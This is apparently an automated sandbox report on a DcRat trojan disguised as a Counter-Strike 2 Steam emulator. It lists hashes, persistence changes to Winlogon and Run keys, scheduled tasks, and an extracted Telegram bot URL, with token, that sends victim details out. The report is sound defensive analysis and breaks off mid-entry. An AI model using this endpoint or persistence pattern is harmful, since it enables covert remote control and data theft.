Analysis
-
max time kernel
30s -
max time network
34s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
23-07-2024 04:19
Behavioral task
behavioral1
Sample
Cs2SteamEmul.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Cs2SteamEmul.exe
Resource
win7-20240704-en
Behavioral task
behavioral3
Sample
Cs2SteamEmul.exe
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
Cs2SteamEmul.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
Cs2SteamEmul.exe
Resource
win11-20240709-en
General
-
Target
Cs2SteamEmul.exe
-
Size
2.8MB
-
MD5
d48669a634489ed4baf9e84aedd9d2bd
-
SHA1
e7b7bdf6e10584eb07547e7237bd654b42abcf84
-
SHA256
4415d417dd1b3ccd3c86fa55cf3add99e493218cb0c1405efaf8e55ac7b5c666
-
SHA512
d902e3d77f7cc33f806b1e298fb51905636bb9ea83cf5a030c18ed33400e656edf3223a0ff4f6e7fcef20b427413cbf5a5132b914d37f476cd4ad6d90db46a90
-
SSDEEP
49152:8bA3W4Dw1beHhL/rBnVQzQ2Bq5U+0HE26wyiK4Csx7aPNUmTk:8b6PHhXB6e2dHfxJ1xu/k
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6979274084:AAEyYu9GraaLRF3G8cNhU_3K2BT8GSrxiUE/sendPhoto?chat_id=5314031191&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20645063668d17ff5429f7855e369fa0c38d2b1733%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20WNIKVPKE%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CUsers%5CAll%20Users%5CMozilla-1de4eec8-1241-4177-a864-e594e8d1fb38%5Cupdates%5C308046B0AF4A39CB%5Cwinlogon.ex
Signatures
-
DcRat 56 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 1180 schtasks.exe 2356 schtasks.exe 5668 schtasks.exe 844 schtasks.exe 3900 schtasks.exe 2068 schtasks.exe 4608 schtasks.exe 3552 schtasks.exe 2760 schtasks.exe 568 schtasks.exe 4668 schtasks.exe 5672 schtasks.exe 1700 schtasks.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\VisualElements\69ddcba757bf72 hyperBrowser.exe 2212 schtasks.exe 4156 schtasks.exe 3780 schtasks.exe 6132 schtasks.exe 2164 schtasks.exe 1940 schtasks.exe 480 schtasks.exe 2376 schtasks.exe 5496 schtasks.exe Key created \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings Cs2SteamEmul.exe 1856 schtasks.exe 3436 schtasks.exe 492 schtasks.exe 644 schtasks.exe 788 schtasks.exe 1360 schtasks.exe 2924 schtasks.exe 1664 schtasks.exe 2732 schtasks.exe 4504 schtasks.exe 1156 schtasks.exe 1632 schtasks.exe 3448 schtasks.exe 5436 schtasks.exe 3856 schtasks.exe 3472 schtasks.exe 1996 schtasks.exe 756 schtasks.exe 6076 schtasks.exe 1612 schtasks.exe 3288 schtasks.exe 2112 schtasks.exe 1168 schtasks.exe 1668 schtasks.exe 2388 schtasks.exe 1680 schtasks.exe 2744 schtasks.exe 832 schtasks.exe 3400 schtasks.exe 1900 schtasks.exe 5172 schtasks.exe 4052 schtasks.exe -
Modifies WinLogon for persistence 2 TTPs 18 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\", \"C:\\Windows\\Speech\\RuntimeBroker.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\SppExtComObj.exe\", \"C:\\Windows\\Setup\\State\\sppsvc.exe\", \"C:\\ChainSurrogateref\\smss.exe\", \"C:\\Program Files\\Uninstall Information\\smss.exe\", \"C:\\Users\\Public\\Pictures\\cmd.exe\", \"C:\\Users\\Admin\\OfficeClickToRun.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\", \"C:\\Windows\\Speech\\RuntimeBroker.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\", \"C:\\Windows\\Speech\\RuntimeBroker.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\SppExtComObj.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\", \"C:\\Windows\\Speech\\RuntimeBroker.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\SppExtComObj.exe\", \"C:\\Windows\\Setup\\State\\sppsvc.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\", \"C:\\Windows\\Speech\\RuntimeBroker.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\SppExtComObj.exe\", \"C:\\Windows\\Setup\\State\\sppsvc.exe\", \"C:\\ChainSurrogateref\\smss.exe\", \"C:\\Program Files\\Uninstall Information\\smss.exe\", \"C:\\Users\\Public\\Pictures\\cmd.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\", \"C:\\Windows\\Speech\\RuntimeBroker.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\winlogon.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\", \"C:\\Windows\\Speech\\RuntimeBroker.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\SppExtComObj.exe\", \"C:\\Windows\\Setup\\State\\sppsvc.exe\", \"C:\\ChainSurrogateref\\smss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\", \"C:\\Windows\\Speech\\RuntimeBroker.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\", \"C:\\Windows\\Speech\\RuntimeBroker.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\", \"C:\\Program Files\\Windows Mail\\spoolsv.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\ChainSurrogateref\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\", \"C:\\ChainSurrogateref\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\", \"C:\\Windows\\Speech\\RuntimeBroker.exe\", \"C:\\ChainSurrogateref\\SearchHost.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\SppExtComObj.exe\", \"C:\\Windows\\Setup\\State\\sppsvc.exe\", \"C:\\ChainSurrogateref\\smss.exe\", \"C:\\Program Files\\Uninstall Information\\smss.exe\"" hyperBrowser.exe -
Process spawned unexpected child process 54 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1180 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2112 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1632 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5496 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3400 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1360 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1612 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3472 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3288 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2924 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1168 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6132 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1856 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2212 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2356 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1680 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2164 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3448 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1940 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4668 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3436 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 480 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3552 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2760 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1900 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5172 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1668 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5668 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2388 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5436 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 644 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 568 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2744 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3856 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 788 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4156 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2376 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5672 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 832 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 844 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 492 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1664 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1700 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3900 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4052 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1996 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3780 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2732 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2068 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4608 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 756 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4504 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1156 4148 schtasks.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6076 4148 schtasks.exe 83 -
resource yara_rule behavioral5/files/0x000200000002aa35-10.dat dcrat behavioral5/memory/2828-13-0x0000000000260000-0x00000000004F2000-memory.dmp dcrat -
Disables Task Manager via registry modification
-
Executes dropped EXE 2 IoCs
pid Process 2828 hyperBrowser.exe 6064 winlogon.exe -
Adds Run key to start application 2 TTPs 34 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Windows Mail\\spoolsv.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Windows\\Setup\\State\\sppsvc.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\ChainSurrogateref\\smss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Users\\Public\\Pictures\\cmd.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Users\\Public\\Pictures\\cmd.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\ChainSurrogateref\\csrss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Speech\\RuntimeBroker.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\SppExtComObj.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\SearchHost = "\"C:\\ChainSurrogateref\\SearchHost.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\ChainSurrogateref\\conhost.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Users\\Admin\\OfficeClickToRun.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\90.0.818.66\\VisualElements\\smss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\ChainSurrogateref\\csrss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\SppExtComObj.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Windows Mail\\spoolsv.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\winlogon.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files (x86)\\Windows 